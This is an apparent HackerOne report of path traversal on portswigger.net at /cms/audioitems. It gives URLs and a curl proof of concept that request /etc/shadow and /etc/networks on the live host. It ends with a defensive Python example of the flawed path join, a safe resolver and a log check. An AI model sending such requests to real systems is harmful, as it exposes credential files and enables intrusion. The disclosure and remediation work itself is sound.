HackerOne report H1:2424815 by 0xd0m7, Mar 20, 2024 - 7:26 a.m.

PortSwigger Web Security: [portswigger.net] Path Traversal at /cms/audioitems

Tags: portswigger web security, path traversal, vulnerability, remote attackers, internal files, privilege escalation

AI Score: 7 High (Confidence: Low)

Prelude.
I wasn't going to report it; I thought it was your laboratory, but after my first analysis this seems real.

Description
A path traversal as root user was detected that allows remote attackers to see internal files as root.

https://portswigger.net/cms/audioitems//etc/networks
https://portswigger.net/cms/audioitems//etc/shadow

PoC
curl -kis "https://portswigger.net/cms/audioitems//etc/shadow"
{F3132191}

Impact

Ability to read internal files as root
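The URLs in the report carry an absolute path (`/etc/shadow`) after the route, which is what the double slash in `/cms/audioitems//etc/shadow` produces. The following is an added example, not PortSwigger's code: it assumes the handler joined that suffix onto a content directory (the route prefix and the `/srv/cms/audioitems` base are hypothetical), shows why such a join escapes the directory, and gives a resolver plus a log-side check that refuse it.

```python
"""Added example (not PortSwigger's code): an absolute suffix such as
'/etc/shadow' escapes a content directory when a handler joins it onto a
base path, and a resolver that refuses it. Route and base are assumptions."""
import posixpath
from typing import Optional

ROUTE = "/cms/audioitems/"
BASE = "/srv/cms/audioitems"          # hypothetical content root


def suffix_from_path(url_path: str) -> str:
    """Strip the route prefix; '/cms/audioitems//etc/shadow' -> '/etc/shadow'."""
    if not url_path.startswith(ROUTE):
        raise ValueError("not an audioitems request")
    return url_path[len(ROUTE):]


def naive_resolve(url_path: str) -> str:
    """Defective pattern: posixpath.join discards BASE when the suffix is
    absolute, so the double slash in the URL becomes a read of /etc/shadow."""
    return posixpath.normpath(posixpath.join(BASE, suffix_from_path(url_path)))


def safe_resolve(url_path: str) -> Optional[str]:
    """Canonicalise, then require the result to stay inside BASE.
    Rejects absolute suffixes ('/etc/shadow') and '..' escapes alike.
    normpath does not follow symlinks; resolve them too if BASE may contain any."""
    candidate = posixpath.normpath(posixpath.join(BASE, suffix_from_path(url_path)))
    if candidate == BASE or candidate.startswith(BASE + "/"):
        return candidate
    return None


def flag_request(url_path: str) -> bool:
    """Detection-side check for access-log review: True when the request
    would have resolved outside BASE under the naive handler."""
    try:
        return safe_resolve(url_path) is None
    except ValueError:
        return False
```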
